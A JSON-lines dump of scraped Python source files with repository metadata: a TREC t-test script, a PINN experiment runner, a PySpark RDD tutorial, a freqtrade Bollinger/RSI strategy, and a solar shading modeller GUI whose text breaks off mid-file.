+{"seq_id": "10075611518", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"Compute statistical test on trec results.\"\"\"\n\nimport sys\nimport re\nimport json\nimport numpy\nfrom collections import defaultdict\nfrom scipy import stats\n\n\ndef load_trec_results(input):\n keys, scores = [], []\n with open(input, 'r') as f:\n for line in f:\n line = line.strip()\n line = re.sub(\"\\s+\", \" \", line)\n cols = line.split()\n if len(cols) == 3:\n keys.append(cols[1])\n scores.append(float(cols[2]))\n return (keys, scores)\n\n\ndef get_field_scores(scores, ids):\n tmp = []\n for i, id in enumerate(scores[0]):\n if id in ids:\n tmp.append(scores[1][i])\n return tmp\n\n\nwith open('data/topics/domains.json') as json_file:\n fields = json.load(json_file)\n field_to_topic_ids = defaultdict(list)\n for topic_id in fields:\n for field in fields[topic_id]:\n field_to_topic_ids[field].append(topic_id)\n\nscores_a = load_trec_results(sys.argv[1])\nscores_b = load_trec_results(sys.argv[2])\n\nassert(scores_a[0][:-1] == scores_b[0][:-1])\n\nprint('scoring for file: {}'.format(sys.argv[1]))\nprint('all: {0:.4f}'.format(numpy.average(scores_a[1][:-1])))\n\nprint('scoring for file: {}'.format(sys.argv[2]))\nprint('all: {0:.4f}'.format(numpy.average(scores_b[1][:-1])))\n\nprint(stats.ttest_rel(a=scores_a[1][:-1],\n b=scores_b[1][:-1]))\n\nprint('statistics for fields')\n# for field_id in range(1, 9):\nfor field_id in range(1, 3):\n\n field_scores_a = get_field_scores(scores_a, field_to_topic_ids[field_id])\n field_scores_b = get_field_scores(scores_b, field_to_topic_ids[field_id])\n\n print('field: {0}, size: {1}, score 1: {2:.4f}, score 2: {3:.4f}, delta: {4:.1f}, {5}, {6:.4f}'.format(\n field_id,\n len(field_to_topic_ids[field_id]),\n numpy.average(field_scores_a),\n numpy.average(field_scores_b),\n ((numpy.average(field_scores_b) / numpy.average(field_scores_a)) - 1 ) *100,\n stats.ttest_rel(a=field_scores_a, b=field_scores_b),\n (numpy.average(field_scores_b) - numpy.average(field_scores_a)) * 100\n ))\n\n# print('statistics for queries')\n# for i, id in enumerate(scores_a[0][:-1]):\n# print('query: {0}\\t{1:.4f}\\t{2:.4f}\\t{3}'.format(\n# id, \n# scores_a[1][i],\n# scores_b[1][i],\n# fields[id]\n# ))\n\n\n\n\n\n", "repo_name": "boudinfl/ir-using-kg", "sub_path": "src/ttest.py", "file_name": "ttest.py", "file_ext": "py", "file_size_in_byte": 2387, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "53", "api": [{"api_name": "re.sub", "line_number": 18, "usage_type": "call"}, {"api_name": "json.load", "line_number": 35, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 36, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 42, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.average", "line_number": 47, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.average", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.stats.ttest_rel", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.average", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 67, "usage_type": "call"}, {"api_name": "scipy.stats.ttest_rel", "line_number": 68, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.average", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "40098155449", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 24 16:44:59 2021\n\n@author: rober\n\"\"\"\nimport pickle\nimport sys\nimport time\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom experiments.Models.CVPinn import CVPinn\nfrom experiments.Models.FEM import FEM\nfrom experiments.Models.RescalingVariationalPinn import RescalingVariationalPinn\nfrom experiments.Models.VanillaCurriculumLearning import VanillaCurriculumPinn\nfrom experiments.Models.VanillaPinn import VanillaPinn\nfrom experiments.Models.VariationalPinn import VariationalPinn\nfrom experiments.Models.VariationalPinnExactSampler import VariationalPinnExactSampler\nfrom experiments.Models.VariationalPinn_minimim_on_u import VariationalPinnMinOnU\nfrom experiments.utils import g, n, PlusX, get_prediction_domain\nfrom lib.IntelligentModels.NNFlow import NNFlow\nfrom lib.utils import Bounds, NamedPartial\n\n\n# os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n# tf.get_logger().setLevel('INFO')\n\n\ndef experiment(experiment_type, repetition, epsilon, n_train_r, sampler, float_precision, k, alpha, g, n,\n r_weight_proportion=0.5, test_factor=10):\n tf.set_random_seed(repetition)\n np.random.seed(repetition)\n\n x_bounds = Bounds(lower=0, upper=1)\n\n t0 = time.time()\n e = experiment_type(epsilon=epsilon, potential=PlusX(), g=g, alpha=alpha, k=k, n=n)\n results = e.experiment(\n n_samplings=1,\n n_train_r=n_train_r,\n r_weight_proportion=r_weight_proportion,\n max_samplings=1,\n n_iters_per_sampling=1000000,\n coords2predict=get_prediction_domain([x_bounds], num_per_dim2pred=n_train_r * test_factor),\n x_bounds=x_bounds,\n intelligent_model=lambda: NNFlow(hidden_layers=(10, 10),\n limit_zero=False,\n float_precision=float_precision), # True = NN*x(1-x)\n sampler=sampler\n )[0]\n t = time.time() - t0\n\n return results, t\n\n\nif __name__ == \"__main__\":\n path, experiment_name, epsilon, repetition, n_train_r, sampler, float_precision, k, alpha, r_weight_proportion, \\\n test_factor = sys.argv[1:]\n filename = \"{}/{}_{}_{}_{}_{}_{}.pickle\".format(path, experiment_name, epsilon, repetition, n_train_r, sampler,\n float_precision)\n\n print(\"Doing experiment: \", filename)\n experiment_type = {\n \"FEM\": FEM,\n \"VanillaPinn\": VanillaPinn,\n \"VanillaCurriculumPinn10\": NamedPartial(VanillaCurriculumPinn, num_epsilons=10),\n \"VanillaCurriculumPinn20\": NamedPartial(VanillaCurriculumPinn, num_epsilons=20),\n \"CVPinn\": CVPinn,\n \"VariationalPinn\": VariationalPinn,\n \"VariationalPinnExpTrue\": NamedPartial(VariationalPinn, exp_integration=True),\n \"VariationalPinnExactSampler\": VariationalPinnExactSampler,\n \"VariationalPinnMinOnU\": VariationalPinnMinOnU,\n \"VariationalRescaling\": RescalingVariationalPinn\n }[experiment_name]\n epsilon = float(epsilon)\n repetition = int(repetition)\n n_train_r = int(n_train_r)\n sampler = np.linspace if \"linspace\" in sampler.lower() else np.random.uniform\n # float_precision = getattr(tf, \"float{}\".format(float_precision))\n float_precision = {16: tf.float16, 32: tf.float32, 64: tf.float64}[int(float_precision)]\n pred, t_fit = experiment(\n experiment_type=experiment_type,\n repetition=repetition,\n epsilon=epsilon,\n n_train_r=n_train_r,\n sampler=sampler,\n float_precision=float_precision,\n k=float(k),\n alpha=float(alpha),\n g=g,\n n=n,\n r_weight_proportion=float(r_weight_proportion),\n test_factor=int(test_factor)\n )\n\n with open(filename, \"wb\") as f:\n pickle.dump({\"pred\": pred, \"t\": t_fit}, f)\n", "repo_name": "agussomacal/ConDiPINN", "sub_path": "src/experiments/experiment_parallel_sequential.py", "file_name": "experiment_parallel_sequential.py", "file_ext": "py", "file_size_in_byte": 3781, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.set_random_seed", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 34, "usage_type": "attribute"}, {"api_name": "lib.utils.Bounds", "line_number": 36, "usage_type": "call"}, {"api_name": "time.time", "line_number": 38, "usage_type": "call"}, {"api_name": "experiments.utils.PlusX", "line_number": 39, "usage_type": "call"}, {"api_name": "experiments.utils.g", "line_number": 39, "usage_type": "name"}, {"api_name": "experiments.utils.n", "line_number": 39, "usage_type": "name"}, {"api_name": "experiments.utils.get_prediction_domain", "line_number": 46, "usage_type": "call"}, {"api_name": "lib.IntelligentModels.NNFlow.NNFlow", "line_number": 48, "usage_type": "call"}, {"api_name": "time.time", "line_number": 53, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 60, "usage_type": "attribute"}, {"api_name": "experiments.Models.FEM.FEM", "line_number": 66, "usage_type": "name"}, {"api_name": "experiments.Models.VanillaPinn.VanillaPinn", "line_number": 67, "usage_type": "name"}, {"api_name": "lib.utils.NamedPartial", "line_number": 68, "usage_type": "call"}, {"api_name": "experiments.Models.VanillaCurriculumLearning.VanillaCurriculumPinn", "line_number": 68, "usage_type": "argument"}, {"api_name": "lib.utils.NamedPartial", "line_number": 69, "usage_type": "call"}, {"api_name": "experiments.Models.VanillaCurriculumLearning.VanillaCurriculumPinn", "line_number": 69, "usage_type": "argument"}, {"api_name": "experiments.Models.CVPinn.CVPinn", "line_number": 70, "usage_type": "name"}, {"api_name": "experiments.Models.VariationalPinn.VariationalPinn", "line_number": 71, "usage_type": "name"}, {"api_name": "lib.utils.NamedPartial", "line_number": 72, "usage_type": "call"}, {"api_name": "experiments.Models.VariationalPinn.VariationalPinn", "line_number": 72, "usage_type": "argument"}, {"api_name": "experiments.Models.VariationalPinnExactSampler.VariationalPinnExactSampler", "line_number": 73, "usage_type": "name"}, {"api_name": "experiments.Models.VariationalPinn_minimim_on_u.VariationalPinnMinOnU", "line_number": 74, "usage_type": "name"}, {"api_name": "experiments.Models.RescalingVariationalPinn.RescalingVariationalPinn", "line_number": 75, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 80, "usage_type": "attribute"}, {"api_name": "numpy.random", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tensorflow.float16", "line_number": 82, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 82, "usage_type": "attribute"}, {"api_name": "tensorflow.float64", "line_number": 82, "usage_type": "attribute"}, {"api_name": "experiments.utils.g", "line_number": 92, "usage_type": "name"}, {"api_name": "experiments.utils.n", "line_number": 93, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 99, "usage_type": "call"}]}
+{"seq_id": "36719572007", "text": "\"\"\"\n1. https://sparkbyexamples.com/pyspark-rdd\n2. https://kknews.cc/zh-tw/code/j24qnle.html\n3. Official RDD programming guide https://spark.apache.org/docs/latest/rdd-programming-guide.html\nRDD - Resilient Distributed Dataset 可回复式(或称弹性式)分散式资料集\n\n这要说到Hadoop,Hadoop这篇论文是Google实作的一个档案系统外加Map Reduce\n\nHadoop解决了分散工作时,某台计��节点换掉时的补救机制,主要思想也很简单,\n把计算过程(或是中间值)存到别台计算节点上,每一台都多花一些档案空间来做这些事,\n并且识别是否有计算节点坏掉,重新读取值中间计算结果的机制\n\nSpark是In memory的分散式架构,自然也继承了Hadoop这个设计特色,\n并且让资料在内存存不下时,暂存到档案系统中,\nRDD资料集格式已经广泛被分散式储存/计算框架所采用\n\n对比来说,RDDs其实就像Python的list,啥都能装\n但RDD可以被分散在不同机器上,不同行程中,并且RDD可以被平行执行\n\n对RDD的操作最常用的就是map() filter() persist()\n\nPySpark RDD的特色\n\n1. In Memory \n 对比Hadoop的Map Reduce(写到硬盘中),saprk走内存,\n 意味着更快的存取,不会有IO bound\n2. Immutability\n 每一个RDD都是不可变,每经过一次Transform,就会开一个新的RDD,\n 并记得上一个RDD和新的RDD的关系\n3. Fault Tolerance\n 在HDFS, S3上跑任意的RDD坏掉时,会从其他计算节点找回资料,\n 并且Pyspark任务失败时会从新尝试\n4. Lazy Evolution\n RDD transform是先说明运算规则(map),在进行转换(transform),\n 和旧版tensorflow是同样的,中间使用DAG来记录顺序关系\n5. Partitioning\n 当你从资料建立RDD时,预设会把它做partition,\n 预设是看你有几个core就做几个partition\n\n6. SparkContext有非常多rdd的方法可以叫\n 1. parallelize() - create rdd from list\n 2. textFile() - (.txt file) into RDD\n 3. wholeTextFiles() - PairRDD with key : filepath, value : file content\n 4. emptyRDD - attribute, RDD with no data, no partition\n 5. parallelize([], 10) - emptyRDD with 10 partitions.\n\nDig more \nhttps://sparkbyexamples.com/pyspark-rdd/\n\n\"\"\"\n\n# 建立RDD\n\n# 1. parallelizing from existing collection\n# 2. (Often used for production application)\n# referencing a dataset in an external sotrage ststem(HDFS, S3, HBase)\n\nfrom pyspark.sql import SparkSession\n\nspark = (\n SparkSession.builder.master(\"local[1]\").appName(\"SparkByExamples.com\").getOrCreate()\n)\n\n\ndata = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\nrdd = spark.sparkContext.parallelize(data, 4)\nprint(\"Method of RDD : \", dir(rdd))\nprint(\"initial partition count : \", str(rdd.getNumPartitions()))\nprint(\"RDD count : \" + str(rdd.count()))\nprint(\"Whole list is : \", rdd.collect())\n", "repo_name": "YLTsai0609/pyspark_101", "sub_path": "004_rdd_creation.py", "file_name": "004_rdd_creation.py", "file_ext": "py", "file_size_in_byte": 2856, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyspark.sql.SparkSession.builder.master", "line_number": 61, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 61, "usage_type": "name"}]}
+{"seq_id": "73896180008", "text": "import talib.abstract as ta\nfrom pandas import DataFrame\nfrom technical.util import resample_to_interval, resampled_merge\n\nimport freqtrade.vendor.qtpylib.indicators as qtpylib\nfrom freqtrade.strategy import IStrategy, merge_informative_pair\n\n\nclass BBRSIS(IStrategy):\n \"\"\"\n Default Strategy provided by freqtrade bot.\n You can override it with your own strategy\n \"\"\"\n\n # Minimal ROI designed for the strategy\n minimal_roi = {\n\t\"0\": 0.30,\n }\n\n # Optimal stoploss designed for the strategy\n stoploss = -0.99\n\n # Optimal ticker interval for the strategy\n ticker_interval = '5m'\n\n # Optional order type mapping\n order_types = {\n 'buy': 'limit',\n 'sell': 'limit',\n 'stoploss': 'limit',\n 'stoploss_on_exchange': False\n }\n\n # Optional time in force for orders\n order_time_in_force = {\n 'buy': 'gtc',\n 'sell': 'gtc',\n }\n \n def get_ticker_indicator(self):\n return int(self.timeframe[:-1])\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Adds several different TA indicators to the given DataFrame\n Performance Note: For the best performance be frugal on the number of indicators\n you are using. Let uncomment only the indicator you are using in your strategies\n or your hyperopt configuration, otherwise you will waste your memory and CPU usage.\n :param dataframe: Raw data from the exchange and parsed by parse_ticker_dataframe()\n :param metadata: Additional information, like the currently traded pair\n :return: a Dataframe with all mandatory indicators for the strategies\n \"\"\"\n\n # Momentum Indicator\n # ------------------------------------\n # RSIs\n dataframe['sma5'] = ta.SMA(dataframe, timeperiod=5)\n dataframe['sma75'] = ta.SMA(dataframe, timeperiod=75)\n dataframe['sma200'] = ta.SMA(dataframe, timeperiod=200)\n \n dataframe_short = resample_to_interval(dataframe, self.get_ticker_indicator() * 3)\n dataframe_medium = resample_to_interval(dataframe, self.get_ticker_indicator() * 6)\n dataframe_long = resample_to_interval(dataframe, self.get_ticker_indicator() * 10)\n \n dataframe_short['rsi'] = ta.RSI(dataframe_short, timeperiod=20)\n dataframe_medium['rsi'] = ta.RSI(dataframe_medium, timeperiod=20)\n dataframe_long['rsi'] = ta.RSI(dataframe_long, timeperiod=20)\n \n dataframe = resampled_merge(dataframe, dataframe_short)\n dataframe = resampled_merge(dataframe, dataframe_medium)\n dataframe = resampled_merge(dataframe, dataframe_long)\n \n dataframe['rsi'] = ta.RSI(dataframe, timeperiod=20)\n \n dataframe.fillna(method='ffill', inplace = True)\n \n # Bollinger bands\n bollinger = qtpylib.bollinger_bands(qtpylib.typical_price(dataframe), window=20, stds=3)\n dataframe['bb_lowerband'] = bollinger['lower']\n dataframe['bb_middleband'] = bollinger['mid']\n dataframe['bb_upperband'] = bollinger['upper']\n\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Based on TA indicators, populates the buy signal for the given dataframe\n :param dataframe: DataFrame\n :param metadata: Additional information, like the currently traded pair\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[\n (\n (dataframe['close'] < dataframe['bb_lowerband']) &\n (dataframe['sma5'] >= dataframe['sma75']) &\n (dataframe['sma75'] >= dataframe['sma200']) &\n (dataframe['rsi'] < (dataframe['resample_{}_rsi'.format(self.get_ticker_indicator() * 3)] - 5)) &\n (dataframe['volume'] > 0)\n ),\n 'buy'] = 1\n\n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Based on TA indicators, populates the sell signal for the given dataframe\n :param dataframe: DataFrame\n :param metadata: Additional information, like the currently traded pair\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[\n (\n (dataframe['close'] > dataframe['bb_middleband']) &\n (dataframe['rsi'] > dataframe['resample_{}_rsi'.format(self.get_ticker_indicator()*3)] + 5) &\n (dataframe['rsi'] > dataframe['resample_{}_rsi'.format(self.get_ticker_indicator()*6)]) &\n (dataframe['rsi'] > dataframe['resample_{}_rsi'.format(self.get_ticker_indicator()*10)]) &\n (dataframe['volume'] > 0)\n ),\n 'sell'] = 1\n return dataframe\n", "repo_name": "davidzr/freqtrade-strategies", "sub_path": "strategies/BBRSIS/BBRSIS.py", "file_name": "BBRSIS.py", "file_ext": "py", "file_size_in_byte": 4812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "freqtrade.strategy.IStrategy", "line_number": 9, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 43, "usage_type": "name"}, {"api_name": "talib.abstract.SMA", "line_number": 57, "usage_type": "call"}, {"api_name": "talib.abstract", "line_number": 57, "usage_type": "name"}, {"api_name": "talib.abstract.SMA", "line_number": 58, "usage_type": "call"}, {"api_name": "talib.abstract", "line_number": 58, "usage_type": "name"}, {"api_name": "talib.abstract.SMA", "line_number": 59, "usage_type": "call"}, {"api_name": "talib.abstract", "line_number": 59, "usage_type": "name"}, {"api_name": "technical.util.resample_to_interval", "line_number": 61, "usage_type": "call"}, {"api_name": "technical.util.resample_to_interval", "line_number": 62, "usage_type": "call"}, {"api_name": "technical.util.resample_to_interval", "line_number": 63, "usage_type": "call"}, {"api_name": "talib.abstract.RSI", "line_number": 65, "usage_type": "call"}, {"api_name": "talib.abstract", "line_number": 65, "usage_type": "name"}, {"api_name": "talib.abstract.RSI", "line_number": 66, "usage_type": "call"}, {"api_name": "talib.abstract", "line_number": 66, "usage_type": "name"}, {"api_name": "talib.abstract.RSI", "line_number": 67, "usage_type": "call"}, {"api_name": "talib.abstract", "line_number": 67, "usage_type": "name"}, {"api_name": "technical.util.resampled_merge", "line_number": 69, "usage_type": "call"}, {"api_name": "technical.util.resampled_merge", "line_number": 70, "usage_type": "call"}, {"api_name": "technical.util.resampled_merge", "line_number": 71, "usage_type": "call"}, {"api_name": "talib.abstract.RSI", "line_number": 73, "usage_type": "call"}, {"api_name": "talib.abstract", "line_number": 73, "usage_type": "name"}, {"api_name": "freqtrade.vendor.qtpylib.indicators.bollinger_bands", "line_number": 78, "usage_type": "call"}, {"api_name": "freqtrade.vendor.qtpylib.indicators", "line_number": 78, "usage_type": "name"}, {"api_name": "freqtrade.vendor.qtpylib.indicators.typical_price", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 85, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 104, "usage_type": "name"}]}
+{"seq_id": "34807277842", "text": "# ssm_v0.3 - solar shading modeller\r\n# New in v0.3 - Added GUI\r\n# New in v0.4 - Added StreetView Pano ID search tool\r\n\r\n# This program calculates how much solar irradiation is reduced due to shading by surrounding obstructions,\r\n# It requires the input of either 1. a hemispherical fisheye image taken upwards (true north aligned with image north,\r\n# or 2. a 360 deg spherical panorama (true north aligned with the left of the image)\r\n# Written by Bowen: fan_b@meng.ucl.ac.uk\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport csv\r\nimport PySimpleGUI as sg\r\nimport os\r\nimport re\r\nfrom math import *\r\nfrom PIL import Image\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\nfrom resizeimage import resizeimage\r\n\r\n# Begin Pano ID search function\r\n\r\ndef get_pano_id(maps_url):\r\n pano_id = re.search('!1s(.*)!2e', maps_url)\r\n return pano_id.group(1)\r\n\r\n\r\n# End Pano ID search function\r\n\r\n\r\n# Begin geometry functions\r\n\r\ndef cylindrical_to_cartesian(distance, azimuth, height):\r\n azi_rad = np.deg2rad(azimuth)\r\n x_cart = distance * np.cos(azi_rad)\r\n y_cart = distance * np.sin(azi_rad)\r\n z_cart = height\r\n return x_cart,y_cart,z_cart\r\n\r\n\r\ndef cylindrical_to_horizontal(distance, height):\r\n elev_obj_rad = np.arctan((height/distance))\r\n elev_obj_deg = np.rad2deg(elev_obj_rad)\r\n return elev_obj_deg\r\n\r\n\r\ndef azimuth_to_elevation(azimuth_integer):\r\n elevation = linspace_elevations[azi_deg_rounded-1]\r\n print('Obstruction elevation: ', elevation, file=text_data)\r\n print('Obstruction elevation: ', elevation)\r\n return elevation\r\n\r\n# End geometry functions\r\n\r\n# Begin sun mapping and irradiation functions\r\n# These functions calculate the position of the sun at any point in time through the year\r\n\r\n\r\ndef solar_position_calc(day, hr, min):\r\n # Singapore latitude = 1.3521 degrees North\r\n # Singapore longitude = 103.8198 degrees East\r\n # Singapore timezone is +8 hours from UTC\r\n\r\n latitude = 1.3521\r\n lat_rad = np.deg2rad(latitude)\r\n longitude = 103.8198\r\n lon_rad = np.deg2rad(longitude)\r\n timezone = 8\r\n\r\n # Refer to the NOAA paper \"General Solar Position Calculations\"\r\n # https://www.esrl.noaa.gov/gmd/grad/solcalc/solareqns.PDF\r\n\r\n y = (2 * 3.14159265/365) * (day - 1 + (hr-12)/24)\r\n eqtime = 229.18 * (0.000075 + 0.001868 * np.cos(y) - 0.032077 * np.sin(y) - 0.014615 * np.cos(2 * y)\r\n - 0.040849 * np.sin(2 * y))\r\n declin = 0.006918 - 0.399912 * np.cos(y) + 0.070257 * np.sin(y) - 0.006758 * np.cos(2 * y) + 0.000907 \\\r\n * np.sin(2 * y) - 0.002697 * np.cos(3 * y) + 0.00148 * np.sin(3 * y)\r\n\r\n time_offset = eqtime + 4 * longitude - 60 * timezone\r\n\r\n # Compute true solar time\r\n tst = hr * 60 + min + time_offset\r\n # Compute solar hour angle\r\n ha_deg = (tst/4) - 180\r\n ha_rad = np.deg2rad(ha_deg)\r\n\r\n # Compute solar zenith\r\n cos_zen = np.sin(lat_rad) * np.sin(declin) + np.cos(lat_rad) * np.cos(declin) * np.cos(ha_rad)\r\n zen_rad = np.arccos(cos_zen)\r\n zen_deg = np.rad2deg(zen_rad)\r\n\r\n # Compute solar azimuth\r\n if ha_deg > 0:\r\n cos_pi_minus_azi = ((np.sin(lat_rad) * np.cos(zen_rad) - np.sin(declin)) / (np.cos(lat_rad) * np.sin(zen_rad)))\r\n pi_minus_azi = np.arccos(cos_pi_minus_azi)\r\n azi_deg = (180 + np.rad2deg(pi_minus_azi)) % 360\r\n\r\n else:\r\n cos_pi_minus_azi = ((np.sin(lat_rad) * np.cos(zen_rad) - np.sin(declin)) / (np.cos(lat_rad) * np.sin(zen_rad)))\r\n pi_minus_azi = np.arccos(cos_pi_minus_azi)\r\n azi_deg = (540 - np.rad2deg(pi_minus_azi)) % 360\r\n\r\n # Compute solar elevation to tell whether it is night or day\r\n elev_deg = 90 - zen_deg\r\n if elev_deg >= 0:\r\n night_or_day = 'Day'\r\n else:\r\n night_or_day = 'Night'\r\n\r\n zen_deg_rounded = int(round(zen_deg))\r\n azi_deg_rounded = int(round(azi_deg))\r\n elev_deg_rounded = int(round(elev_deg))\r\n\r\n print('Zenith: ',zen_deg_rounded, '\\nAzimuth: ',azi_deg_rounded,'\\nElevation: ',elev_deg_rounded,'\\n',night_or_day, file=text_data)\r\n print('Zenith: ',zen_deg_rounded, '\\nAzimuth: ',azi_deg_rounded,'\\nElevation: ',elev_deg_rounded,'\\n',night_or_day)\r\n\r\n return zen_deg_rounded, azi_deg_rounded, elev_deg_rounded, night_or_day\r\n\r\n\r\ndef insolation(sun_zenith):\r\n sun_zenith_radians = np.deg2rad(sun_zenith)\r\n solar_constant = 1362 # watts per square meter\r\n insolation = solar_constant * np.cos(sun_zenith_radians)\r\n\r\n return insolation\r\n\r\n# End sun mapping and irradiation functions\r\n\r\n# Begin image manipulation functions\r\n# These functions trace the input image into an array of azimuth and elevation values\r\n# Adapted from the PySolar library\r\n\r\n\r\ndef squareImage(im):\r\n (width, height) = im.size\r\n box = ((width - height) / 2, 0, (width + height) / 2, height)\r\n return im.crop(box)\r\n\r\n\r\ndef despherifyImage(im):\r\n (width, height) = im.size\r\n half_width = int(im.size[0] / 2)\r\n half_height = int(im.size[1] / 2)\r\n inpix = im.load()\r\n out = Image.new(\"L\", (width, half_height))\r\n outpix = out.load()\r\n full_circle = 1000.0 * 2 * pi\r\n for r in range(half_width):\r\n for theta in range(int(full_circle)):\r\n (inx, iny) = (round(r * cos(theta / 1000.0)) + half_width, round(r * sin(theta / 1000.0)) + half_width)\r\n (outx, outy) = (width - width * (theta / full_circle) - 1, r)\r\n outpix[outx, outy] = inpix[inx, iny]\r\n return out\r\n\r\n\r\ndef differentiateImageColumns(im):\r\n (width, height) = im.size\r\n pix = im.load()\r\n for x in range(width):\r\n for y in range(height - 1):\r\n pix[x, y] = min(10 * abs(pix[x, y] - pix[x, y + 1]), 255)\r\n return im\r\n\r\n\r\ndef redlineImage(im, threshold):\r\n (width, height) = im.size\r\n imgcsv_azimuth = []\r\n imgcsv_elevation = [0] * width\r\n pix = im.load()\r\n for x in range(width):\r\n for y in range(height - 1):\r\n (R, G, B) = pix[x, y]\r\n if R + G + B > threshold:\r\n pix[x, y] = (255, 0, 0)\r\n imgcsv_elevation[x] = ((height-y)/height) * 90\r\n break\r\n imgcsv_azimuth.append(x)\r\n return im, imgcsv_azimuth, imgcsv_elevation\r\n\r\n# End image manipulation functions\r\n\r\n# Begin program operation\r\n\r\n# Begin experimental GUI code\r\n\r\nlayout = [[sg.Text('Google Maps URL:', size=(18,1)), sg.Input(key='maps_url')],\r\n [sg.Text('StreetView Pano ID:', size=(18,1)), sg.Input(key='pano_id')],\r\n [sg.Text('', size=(18,1)), sg.Button('Get Pano ID', size=(12,1))],\r\n [sg.Text('Location name:', size=(18,1)), sg.Input(key='location_name')],\r\n [sg.Text('Image type:', size=(18,1)),\r\n sg.Radio('360 deg panorama', \"RADIO1\", default=True, key='pano'),\r\n sg.Radio('Hemispherical fisheye', \"RADIO1\", key='fisheye')],\r\n [sg.Text('Select image file:', size=(18,1)), sg.Input(key='img_filepath'),\r\n sg.FileBrowse(file_types=((\"Images\", \".jpg .png\"),))],\r\n [sg.Text('Output folder:', size=(18,1)), sg.Input(key='output_folder'), sg.FolderBrowse()],\r\n [sg.Text('Sky tracer sensitivity:', size=(18, 1)),\r\n sg.Slider(range=(1, 700), default_value=350, size=(20, 15), orientation='horizontal',\r\n key='sensitivity_slider', enable_events=True, disable_number_display=True),\r\n sg.T('350', key='sensitivity_value', size=(4, 1))],\r\n [sg.Text('', size=(18,1)), sg.Button('Test sensitivity', size=(12,1))],\r\n [sg.Text('Set computation interval:', size=(18,1)),\r\n sg.Slider(range=(1,60), default_value=5, size=(20,15), orientation='horizontal',\r\n key='interval_slider', enable_events=True, disable_number_display=True),\r\n sg.T('5', key='interval_value', size=(4,1))],\r\n [sg.Text('', size=(18,1)), sg.Button('Compute', size=(12,1))]\r\n ]\r\n\r\nwindow = sg.Window('Solar Shading Modeller', layout)\r\n\r\nwhile True: # Event Loop\r\n event, values = window.Read()\r\n # print(event, values)\r\n\r\n if event == 'sensitivity_slider' or 'interval_slide' and event is not None:\r\n window.Element('sensitivity_value').Update(int(values['sensitivity_slider']))\r\n window.Element('interval_value').Update(int(values['interval_slider']))\r\n\r\n if event is None:\r\n break\r\n\r\n if event == 'Get Pano ID':\r\n try:\r\n window.Element('pano_id').Update(get_pano_id(values['maps_url']))\r\n except AttributeError:\r\n sg.Popup('Check that the URL is valid - copy from Google Maps StreetView')\r\n\r\n if event == 'Test sensitivity':\r\n try:\r\n path_Image = values['img_filepath']\r\n threshold = values['sensitivity_slider']\r\n\r\n if values['pano']:\r\n im = Image.open(path_Image).convert(\"L\")\r\n d = differentiateImageColumns(im).convert(\"RGB\")\r\n\r\n elif values['fisheye']:\r\n im = Image.open(path_Image).convert(\"L\")\r\n im = squareImage(im)\r\n lin = despherifyImage(im)\r\n d = differentiateImageColumns(lin).convert(\"RGB\")\r\n\r\n img_resized = resizeimage.resize_width(d, 360)\r\n\r\n r, imgcsv_azimuth, imgcsv_elevation = redlineImage(img_resized, threshold)\r\n\r\n r.show()\r\n\r\n linspace_azimuths = imgcsv_azimuth\r\n linspace_elevations = imgcsv_elevation\r\n\r\n except AttributeError:\r\n sg.Popup('Check that you have provided the image file path')\r\n except FileNotFoundError:\r\n sg.Popup('File not found: Check that you have provided a correct image file path')\r\n\r\n if event == 'Compute':\r\n # Code here also in sensitivity tester\r\n try:\r\n # Create target Directory\r\n os.mkdir(values['output_folder'] + '/' + values['location_name'])\r\n print(\"Directory \", values['output_folder'] + '/' + values['location_name'], \" Created \")\r\n except FileExistsError:\r\n print(\"Directory \", values['output_folder'] + '/' + values['location_name'], \" already exists\")\r\n sg.Popup(\"Directory \", 